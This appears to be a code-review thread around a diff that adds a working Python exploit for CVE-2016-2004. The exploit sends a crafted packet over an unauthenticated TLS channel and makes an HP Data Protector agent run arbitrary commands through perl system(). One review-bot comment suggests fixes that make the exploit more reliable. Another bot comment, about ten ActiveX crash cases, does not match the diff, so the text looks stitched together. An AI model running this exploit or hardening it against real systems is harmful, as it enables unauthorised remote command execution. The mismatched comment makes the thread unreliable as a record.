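Review bot: All ten cases are labelled stack buffer overflows that let an attacker "execute arbitrary code", but the debugger output supports that only for case 1, where `!exchain` shows the SEH record overwritten with `45454545`; cases 2 and 9 stop at the `/GS` cookie check (`STATUS_STACK_BUFFER_OVERRUN`, `push 0C0000409h`) before any return-address use, cases 6 and 7 are `c00000fd` stack exhaustion, and cases 4, 5 and 8 fault dereferencing `baadf00d`, the debug-heap fill for uninitialised memory, i.e. a read/write through an uninitialised pointer rather than a demonstrated stack overwrite. Each heading should carry its class, e.g. `1. MacroName (WdMacCtl.ocx) - SEH overwrite` and `2. NetworkName (iconfig.dll) - /GS abort (DoS)`, so readers can triage the exploitable one. The PoC bodies between each heading and its `===` line are blank in this copy, presumably markup that was stripped; the control instantiation (class id / ProgID) and the argument length used should be restated as plain text so the crashes are reproducible. Case 10 gives only "~300 bytes" with no crash output, so it should be marked as unverified.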
@@ -0,0 +1,154 @@ +#!/usr/bin/python +# +# Exploit Title: Data Protector Encrypted Communications +# Date: 26-05-2016 +# Exploit Author: Ian Lovering +# Vendor Homepage: http://www8.hp.com/uk/en/software-solutions/data-protector-backup-recovery-software/ +# Version: A.09.00 and earlier +# Tested on: Windows Server 2008 +# CVE : CVE-2016-2004 +# + +# This proof of concept demonstrates that enabling encrypted control communication on +# Data Protector agents does not provide any additional security. +# As is provides no authentication it is not a viable workaround to prevent the +# exploitation of well known Data Protector issues such as cve-2014-2623 +# +# This exploit establishes and unauthenticated encrypted communication channel to +# a Data Protector Agent and uses a well known unencrypted Data Protector vulnerability +# to run arbitrary commands on the target. + +# Tested on Kali Linux 2 with python 2.7.9 +# Tested against Data Protector A.09.00 (Internal Build version 88) with encrypted control +# communication enabled. +# All other Data Protector settings are default. +# Tested against Data Protector agent running on Windows 2008 R2 +# Also tested against Data Protector A.07 +# +# encrypted-dataprotector.py -e +# +# By default runs ipconfig on the target. +# Can take a little while to return. 
Have patience ;) +# +# CVE-2016-2004 + +import socket +import ssl +import time +import struct +import argparse + + +parser = argparse.ArgumentParser(prog='test-encrypt.py') +parser.add_argument('-e', '--encrypt', dest='encrypt', action='store_true') +parser.add_argument('-p', '--port', type=int) +parser.add_argument('-c', '--command') +parser.add_argument('ipaddress') +parser.set_defaults(encrypt=False,port=5555) +args = parser.parse_args() + +HOST = args.ipaddress +PORT = args.port + +command = 'ipconfig' + +if args.command: + command = args.command + +# initialise data +initdata = ("\x00\x00\x00\x48\xff\xfe\x32\x00\x36\x00\x37\x00\x00\x00\x20\x00" + "\x31\x00\x30\x00\x00\x00\x20\x00\x31\x00\x30\x00\x30\x00\x00\x00" + "\x20\x00\x39\x00\x30\x00\x30\x00\x00\x00\x20\x00\x38\x00\x38\x00" + "\x00\x00\x20\x00\x6f\x00\x6d\x00\x6e\x00\x69\x00\x64\x00\x6c\x00" + "\x63\x00\x00\x00\x20\x00\x34\x00\x00\x00\x00\x00") + +OFFSET = 46 +command = command.replace("\\", "\\\\") +command = command.replace("\'", "\\\'") +command_length = struct.pack(">I",OFFSET + len(command)) +payload = command_length +\ + "\x32\x00\x01\x01\x01\x01\x01\x01" +\ + "\x00\x01\x00\x01\x00\x01\x00\x01" +\ + "\x01\x00\x20\x32\x38\x00\x5c\x70" +\ + "\x65\x72\x6c\x2e\x65\x78\x65\x00" +\ + "\x20\x2d\x65\x73\x79\x73\x74\x65" +\ + "\x6d('%s')\x00" % command + +def get_data(sock): + response = '' + recv_len =1 + + while recv_len: + data = sock.recv(4096) + recv_len = len(data) + response += data + if recv_len < 4096: + break + + return response + +def get_dp_response(sock): + + print "===== Response =====" + print + + while True: + + # Get information about response + packed_length = sock.recv(4) + if not packed_length: + break + n = struct.unpack(">I", packed_length)[0] + tmpresponse = sock.recv(n) + tmpresponse = tmpresponse.replace("\n", "") + tmpresponse = tmpresponse.replace("\x00", "") + tmpresponse = tmpresponse.replace("\xff\xfe\x39\x20", "") + if tmpresponse.upper().find("*RETVAL*") != -1: + break + 
else: + print tmpresponse + + print + print "===== End =====" + print + + +client = socket.socket( socket.AF_INET, socket.SOCK_STREAM ) + +if args.encrypt: + context = ssl.create_default_context() + context.check_hostname = False + context.verify_mode = ssl.CERT_NONE + context.set_ciphers('ALL') + +try: + client.connect(( HOST, PORT )) + print "Connected" + + if args.encrypt: + # send data protector init string + client.send(initdata) + response = get_data(client) + + # setup tls + client = context.wrap_socket(client) + print "Encryption Enabled" + + # send payload + client.send(payload) + print "Sent Payload" + print "" + print "===== Command =====" + print + print command + print + get_dp_response(client) + + client.close() + +except Exception as e: + print '[*] Exception. Exiting.' + print e + client.close() + +
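Review bot: `get_dp_response` assumes `sock.recv(4)` and `sock.recv(n)` return exactly the requested bytes, but a TCP socket — and in particular the `wrap_socket` SSL socket used with `-e` — may return fewer, after which `struct.unpack(">I", ...)` raises `struct.error` or the next length word is read from the middle of a frame; the loop should read until `n` bytes have arrived, as below. `client.send(initdata)` and `client.send(payload)` should likewise be `client.sendall(...)`, since `send` may write only part of the buffer and the agent would then parse a truncated frame. The `recv_len < 4096` stop condition in `get_data` is a heuristic that can return early on a large banner; it is only used before the TLS upgrade, so it is worth a comment saying so. The `CERT_NONE` / `set_ciphers('ALL')` settings are appropriate for a PoC that is precisely demonstrating the absence of authentication, but a one-line comment saying they are intentional would stop them being "fixed" later.
```python
def _recv_exact(sock, n):
    """Read exactly n bytes; return '' if the peer closes first (recv may be short)."""
    buf = ''
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            return ''
        buf += chunk
    return buf

def get_dp_response(sock):
    # ... unchanged: banner printing ...
    while True:
        packed_length = _recv_exact(sock, 4)
        if not packed_length:
            break
        n = struct.unpack(">I", packed_length)[0]
        tmpresponse = _recv_exact(sock, n)
        # ... unchanged: response cleanup and *RETVAL* check ...
```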